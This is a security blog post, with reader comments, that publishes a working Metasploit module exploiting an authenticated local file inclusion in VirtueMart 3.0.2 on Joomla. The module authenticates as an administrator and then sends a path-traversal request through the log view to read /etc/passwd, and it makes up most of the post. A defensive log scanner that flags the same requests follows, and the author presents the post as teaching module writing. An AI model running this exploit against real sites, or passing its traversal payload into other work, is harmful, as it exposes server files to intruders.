Because this one is for Joomla again, it is again based on the HikaShop LFI PoC.
Enjoy:
Screenshots: preparing to exploit, and the raw results.
And the code:
---<virtuemart_auth_lfi.rb>---
root@kali:/var/www# cat virtuemart_lfi.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'VirtueMart 3 - LFI poc for authenticated users',
      'Description' => %q{
        VirtueMart 3.0.2 is vulnerable to local file include attack.
        Authenticated user can read local files from the server.
        More here: https://twitter.com/HauntITBlog
      },
      'Author'      =>
        [
          'HauntIT Blog', # Discovery
          # MSF module (based on http://hauntit.blogspot.com/2015/01/en-hikashop-lfi-metasploit-module.html)
          'http://hauntit.blogspot.com'
        ],
      'License'     => MSF_LICENSE,
      'Privileged'  => false,
      'Platform'    => ['php'],
      'Arch'        => ARCH_PHP,
      'Targets'     =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      # The framework expects "Mon DD YYYY", not "23.12.2014"
      'DisclosureDate' => 'Dec 23 2014'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
        OptString.new('USERNAME',  [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD',  [ false, "Password to authenticate with", 'admin']),
      ], self.class)
  end

  # No remote fingerprint is implemented, so say so instead of returning nil
  def check
    Exploit::CheckCode::Unknown
  end

  # The Joomla CSRF token is the name of the hidden input whose value is "1".
  # Capture exactly that 32-hex-char name instead of the first MD5-looking
  # string anywhere in the page body.
  def fetch_token(body)
    if body =~ /<input type="hidden" name="([0-9a-f]{32})" value="1"/
      return $1
    end
    nil
  end

  def exploit
    # 1st, we will get cookies and token
    req1 = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'administrator', 'index.php')
    })
    # Check the response before reading anything from it
    if not req1
      fail_with(Failure::Unreachable, "[-] Failed with 1st request")
    end
    cookies = req1.get_cookies
    print_status("[+] Good: " + req1.code.to_s)
    print_good("[+] Got cookie(s): " + cookies)

    token = fetch_token(req1.body)
    if token
      print_good("[+] Got token: " + token)
    else
      fail_with(Failure::UnexpectedReply, "[-] Token not found")
    end

    # now we need to do auth using that token and cookies
    print_status("[+] Trying to auth...")
    auth = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'cookie'    => cookies,
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'passwd'   => datastore['PASSWORD'],
        'option'   => 'com_login',
        'task'     => 'login',
        # base64 of the post-login redirect: the com_virtuemart log view with the traversal path
        'return'   => 'aW5kZXgucGhwP29wdGlvbj1jb21fdmlydHVlbWFydCZ2aWV3PWxvZyZ0YXNrPWVkaXQmbG9nZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
        token      => '1'
      }
    })
    if not auth
      fail_with(Failure::Unreachable, "[-] No response to auth request")
    end
    print_good("[+] Code after auth: " + auth.code.to_s)

    # 3rd step: get + post params to lfi
    print_good('[+] Exploit...')
    readthis = "../../../../../../../../../../../../../../../../../../etc/passwd"
    xpl = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'vars_get' => {
        'option'  => 'com_virtuemart',
        'view'    => 'log',
        'task'    => 'edit',
        'logfile' => readthis
      },
      'cookie'   => cookies
    })
    if xpl
      print_good("[+] Exploit response code: " + xpl.code.to_s)
      print_good("[+] Response body after attack:")
      print_status(xpl.body)
    else
      fail_with(Failure::Unknown, "[-] Cannot exploit it :C")
    end
  end # exploit
end
---<virtuemart_auth_lfi.rb>---
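From the defender's side, as an added example that is not part of the original post or the module above: a small Ruby scanner that walks Apache combined-format access log lines and flags the request shape the module sends, a com_virtuemart log view whose logfile parameter carries a traversal sequence, and the same target smuggled inside the base64 return parameter of the com_login request when it shows up in the query string. The log lines, hosts and paths are constructed for the example.

```ruby
require 'cgi'
require 'base64'

TRAVERSAL = %r{\.\.[/\\]}

# Flatten a query string into name => last value (CGI.parse URL-decodes for us).
def parse_query(query)
  CGI.parse(query.to_s).transform_values(&:last)
end

# Joomla's com_login 'return' parameter is base64; decode only base64-looking values.
def decode_return(value)
  return nil unless value.to_s =~ %r{\A[A-Za-z0-9+/]+=*\z}
  Base64.decode64(value)
end

# Returns a reason string when the request target looks like this LFI, else nil.
def suspicious_virtuemart_request(target)
  path, query = target.split('?', 2)
  return nil unless path.end_with?('/administrator/index.php')
  p = parse_query(query)
  if p['option'] == 'com_virtuemart' && p['view'] == 'log' && p['logfile'].to_s =~ TRAVERSAL
    return "traversal in logfile=#{p['logfile']}"
  end
  if p['option'] == 'com_login' && (ret = decode_return(p['return']))
    inner = parse_query(ret.split('?', 2)[1])
    if inner['option'] == 'com_virtuemart' && inner['logfile'].to_s =~ TRAVERSAL
      return "traversal in base64 return: logfile=#{inner['logfile']}"
    end
  end
  nil
end

# Pull client IP and request target out of Apache combined-format lines.
def scan_log(text)
  text.lines.map do |line|
    m = line.match(/\A(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) /)
    next unless m
    reason = suspicious_virtuemart_request(m[2])
    reason && { ip: m[1], reason: reason }
  end.compact
end

# Constructed sample traffic (hypothetical hosts and paths, not real logs).
ENCODED_RETURN = CGI.escape(Base64.strict_encode64(
  'index.php?option=com_virtuemart&view=log&task=edit&logfile=../../etc/passwd'))
SAMPLE_LOG = [
  '10.0.0.5 - - [23/Dec/2014:10:00:01 +0100] "GET /joomla/administrator/index.php?option=com_virtuemart&view=log&task=edit&logfile=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
  '10.0.0.5 - - [23/Dec/2014:10:00:02 +0100] "GET /joomla/administrator/index.php?option=com_virtuemart&view=log&task=edit&logfile=error.log HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
  "10.0.0.7 - - [23/Dec/2014:10:00:03 +0100] \"GET /joomla/administrator/index.php?option=com_login&task=login&return=#{ENCODED_RETURN} HTTP/1.1\" 303 0 \"-\" \"curl/7.38\"",
  '10.0.0.9 - - [23/Dec/2014:10:00:04 +0100] "GET /joomla/index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"'
].join("\n")

scan_log(SAMPLE_LOG).each { |hit| puts "#{hit[:ip]}: #{hit[:reason]}" }
```

Only the two traversal requests are reported; the legitimate log view of error.log and the unrelated front-end request stay quiet.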
Pastebin version is here.
Cheers,
o/
To be clear, you have to know the administrator username and password of the site in order to be able to carry this out. But if you already know these then you can do pretty much anything you want with the site anyway, e.g. add your own PHP code to the template to include any file you want, so why do you need to do things this way? It is hard to see why you think this is a real exploit.
Hi, first of all: thanks for reading. Regarding your comment: yes, you need the admin's credentials to exploit this vulnerability, and yes, you can add your own PHP code to templates as well (when you have those credentials). In some CMSs you can probably even run SQL queries directly from the web app... but :) This post is not about a super cool & advanced new extreme hacking technique. This post was published to help people learn how to write their own modules for Metasploit. That's all. And that's why the vulnerability exploited by this PoC code was described here - it's a nice example. Cheers.